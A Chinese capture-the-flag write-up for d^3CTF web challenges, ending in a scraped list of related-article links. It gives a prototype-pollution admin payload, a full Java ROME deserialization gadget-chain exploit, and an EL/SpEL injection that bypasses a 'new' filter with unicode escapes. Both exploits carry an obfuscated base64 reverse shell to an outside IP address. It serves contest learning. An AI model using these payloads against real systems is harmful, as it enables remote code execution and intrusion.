d3oj

提示是尝试用oct用户登陆,翻组件版本看到个合适的
https://hackerone.com/reports/869574
编辑文章哪里很明显

POST /article/0/edit HTTP/1.1
Host: xxx
User-Agent: xx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 62
Origin: xxx
Connection: close
Referer: xxxx
Cookie: connect.sid=xx
Upgrade-Insecure-Requests: 1{"title":"test","content":{"__proto__":{
"is_admin":true
}}}

shorter

网上公开的只能缩短到2k
jiang师傅正好不久前就给我看过这个rome的新链子
https://www.yuque.com/jinjinshigekeaigui/qskpi5/cz1um4
结合许少的文章和jiang师傅的新rome链子可以缩短到一千多

package d3;import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.syndication.feed.impl.EqualsBean;
import javassist.*;
import org.jboss.seam.util.Reflections;import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.HashMap;
import java.util.Hashtable;public class exp1 {private static byte[] getTemplatesImpl(String cmd) throws CannotCompileException, IOException, NotFoundException {ClassPool pool = ClassPool.getDefault();CtClass ctClass = pool.makeClass("Evil");CtClass superClass = pool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet");ctClass.setSuperclass(superClass);CtConstructor constructor = CtNewConstructor.make("    public Evil(){\n" +"        try {\n" +"            Runtime.getRuntime().exec(\"" + cmd + "\");\n" +"        }catch (Exception ignored){}\n" +"    }", ctClass);ctClass.addConstructor(constructor);byte[] bytes = ctClass.toBytecode();ctClass.defrost();return bytes;}public static void setFieldValue(Object obj, String fieldname, Object value) throws Exception{Field field = obj.getClass().getDeclaredField(fieldname);field.setAccessible(true);field.set(obj,value);}public static byte[] serialize(Object o) throws Exception{try(ByteArrayOutputStream baout = new ByteArrayOutputStream();ObjectOutputStream oout = new ObjectOutputStream(baout)){oout.writeObject(o);return baout.toByteArray();}}public static void main(String[] args) throws Exception {TemplatesImpl tmpl = new TemplatesImpl();Field bytecodes = Reflections.getField(tmpl.getClass(),"_bytecodes");setFieldValue(tmpl,"_bytecodes",new byte[][]{getTemplatesImpl("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuNzAuNDAuNS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}")});Field name=Reflections.getField(tmpl.getClass(),"_name");setFieldValue(tmpl,"_name","s");EqualsBean bean = new EqualsBean(String.class,"s");HashMap map1 = new HashMap();HashMap map2 = new HashMap();map1.put("yy",bean);map1.put("zZ",tmpl);map2.put("zZ",bean);map2.put("yy",tmpl);Hashtable table = new Hashtable();table.put(map1,"1");table.put(map2,"2");setFieldValue(bean,"_beanClass", Templates.class);setFieldValue(bean,"_obj",tmpl);byte[] s = serialize(table);byte[] payload = Base64.getEncoder().encode(s);System.out.print(new String(payload));

ezsql

存在el注入的地方,但把new过滤了,想到编码绕过。

\\\\u([0-9A-Fa-f]{4})

这个正则可以绕,只要两个或两个以上的u即可,比如${\uu006eew String(“123”)}

直接spel注入,但直接传似乎是有符号问题? 直接全部编码就好了

new javax.script.ScriptEngineManager().getEngineByName(\"js\").eval(\"java.lang.Runtime.getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuNzAuNDAuNS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}')\")"

编码后

${\uu006e\uu0065\uu0077\uu0020\uu006a\uu0061\uu0076\uu0061\uu0078\uu002e\uu0073\uu0063\uu0072\uu0069\uu0070\uu0074\uu002e\uu0053\uu0063\uu0072\uu0069\uu0070\uu0074\uu0045\uu006e\uu0067\uu0069\uu006e\uu0065\uu004d\uu0061\uu006e\uu0061\uu0067\uu0065\uu0072\uu0028\uu0029\uu002e\uu0067\uu0065\uu0074\uu0045\uu006e\uu0067\uu0069\uu006e\uu0065\uu0042\uu0079\uu004e\uu0061\uu006d\uu0065\uu0028\uu0022\uu006a\uu0073\uu0022\uu0029\uu002e\uu0065\uu0076\uu0061\uu006c\uu0028\uu0022\uu006a\uu0061\uu0076\uu0061\uu002e\uu006c\uu0061\uu006e\uu0067\uu002e\uu0052\uu0075\uu006e\uu0074\uu0069\uu006d\uu0065\uu002e\uu0067\uu0065\uu0074\uu0052\uu0075\uu006e\uu0074\uu0069\uu006d\uu0065\uu0028\uu0029\uu002e\uu0065\uu0078\uu0065\uu0063\uu0028\uu0027\uu0062\uu0061\uu0073\uu0068\uu0020\uu002d\uu0063\uu0020\uu007b\uu0065\uu0063\uu0068\uu006f\uu002c\uu0059\uu006d\uu0046\uu007a\uu0061\uu0043\uu0041\uu0074\uu0061\uu0053\uu0041\uu002b\uu004a\uu0069\uu0041\uu0076\uu005a\uu0047\uu0056\uu0032\uu004c\uu0033\uu0052\uu006a\uu0063\uu0043\uu0038\uu0078\uu004d\uu006a\uu0051\uu0075\uu004e\uu007a\uu0041\uu0075\uu004e\uu0044\uu0041\uu0075\uu004e\uu0053\uu0038\uu0078\uu004d\uu006a\uu004d\uu0030\uu0049\uu0044\uu0041\uu002b\uu004a\uu006a\uu0045\uu003d\uu007d\uu007c\uu007b\uu0062\uu0061\uu0073\uu0065\uu0036\uu0034\uu002c\uu002d\uu0064\uu007d\uu007c\uu007b\uu0062\uu0061\uu0073\uu0068\uu002c\uu002d\uu0069\uu007d\uu0027\uu0029\uu0022\uu0029}

哈哈 赛后我hxd告诉我有个类可以直接执行不需要new
${@jdk.jshell.JShell@create().eval('java.lang.Runtime.getRuntime().exec("")}

学到了学到了

d^3CTF web部分wp相关推荐

  1. 逆天通用水印支持Winform,WPF,Web,WP,Win10。支持位置选择(9个位置 ==》[X])...

    常用技能:http://www.cnblogs.com/dunitian/p/4822808.html#skill 逆天博客:http://dnt.dkil.net 逆天通用水印扩展篇~新增剪贴板系列 ...

  2. [BJDCTF 2nd] Web复现 wp

    文章目录 [BJDCTF 2nd] fake google [BJDCTF 2nd]old-hack [BJDCTF 2nd]假猪套天下第一 [BJDCTF 2nd]duangShell [BJDCT ...

  3. mysql 南邮ctf_南邮ctf之web之wp

    下面是所有现在可以做的web题的wp! 建议使用CTRL+F查找所需题目,我都有标注!这样方便! 1.签到题 直接查看源码即可 2.md5 collision 解读代码: $md51 = md5('Q ...

  4. 衡师11月月赛web题目wp

    目录 1.丢三落四的学姐 2.wep?Pwn!!! 这题web部分是buuctf中的DASCTF X GFCTF 2022十月挑战赛!的原题 1.丢三落四的学姐 访问题目位置,很明显的phpstudy ...

  5. catf1ag Web writeup(wp) 可能会持续更新

    文章目录 命令执行之我在干什么 签到题 webshell 无字符webshell int 命令执行 <我的女友是机器人> 变量覆盖_extract 等于False 啥都没了 文件包含 st ...

  6. 【N1BOOK】[第一章 web入门] wp

    第一章 web入门]常见的搜集 wp [N1BOOK][第一章 web入门]常见的搜集 wp [N1BOOK][第一章 web入门]粗心的小李 wp [N1BOOK][第一章 web入门]afr_1 ...

  7. cftshow 七夕杯 web部分WP

    前言 别人七夕陪情侣,我在七夕死做题.... 好吧,先不想别的了,这次七夕杯web前三题还算简单都做出来了,最后一题是关于java sql注入的,java还没学得很好,就没做了,看了群主的直播感觉还是 ...

  8. ichunqiu Web SQli wp

    2020.1.10 菜鸡今天又来水题了. 其实这个题,不是很水[狗头]在i春秋平台上看到了一道名为SQli的web题,想到了自己玩过1%的那个靶场也叫sqli-libs,于是手贱的打开了.咋一看还蛮友 ...

  9. 2018 ISCC re\web\misc WP

    RE RSA256 RSA 上工具 RsaCtfTool.py --publickey ./key.pub –private 公钥比较简单,直接解除对应私钥 然后 openssel My math i ...

  10. [原谅杯]Web部分WP

    @author:Y4tacker @time:2020/11/23 18:19 前言 看到群里又那么多小伙伴想要一份WP,那就写一下吧,其实在我的网站上也有,只是比较简陋,这里比较详细的写一份吧,希望 ...

最新文章

  1. Android和iOS那个好?
  2. arm-linux-gcc的安装
  3. ThreadLocal使用和原理
  4. 基础回顾之List集合
  5. MyBatis使用resultMap自定义映射规则与关联映射
  6. Linux CENTOS6.5 图形命令互转
  7. Tricentis的测试工具评测
  8. django 模型类的常见字段约束,以及filter 过滤和查询
  9. 利用 Python 写个七夕表白神器
  10. 查询url包含的字符串参数(js高程笔记)
  11. Silverlight 中的通信安全访问策略
  12. webConfig详细跳转配置.[转]
  13. 计算机网络物理防护,计算机网络的物理安全
  14. ExtJs6 FontAwesome 图标引用
  15. ABO区块链的实际应用
  16. BUUCTF——CRYPTO(记录不熟悉的题)(4)
  17. 开店攻略: 现代促销的七种促销策略
  18. Python实现经纬度转换
  19. 用PHP+MYSQL写一个完整的登录界面
  20. 『重磅福利』提供WoS数据C1和EM重复字段清洗服务

热门文章

  1. 记录ubuntu22.04突然连不上网
  2. ContentProvider介绍
  3. SpringCloud 学习笔记(2 / 3)
  4. Solaris 中文命令
  5. Deeplab V1
  6. python中unicode函数的包_Python unicodeutil包_程序模块 - PyPI - Python中文网
  7. 机器学习:性能度量指标之查准率和查全率
  8. Centos8.3 nfs-ganesha使用ceph后端
  9. CSMA/CD与CSMA/CA区别
  10. 小米电视如何安装第三方软件观看有线电视?看我如何操作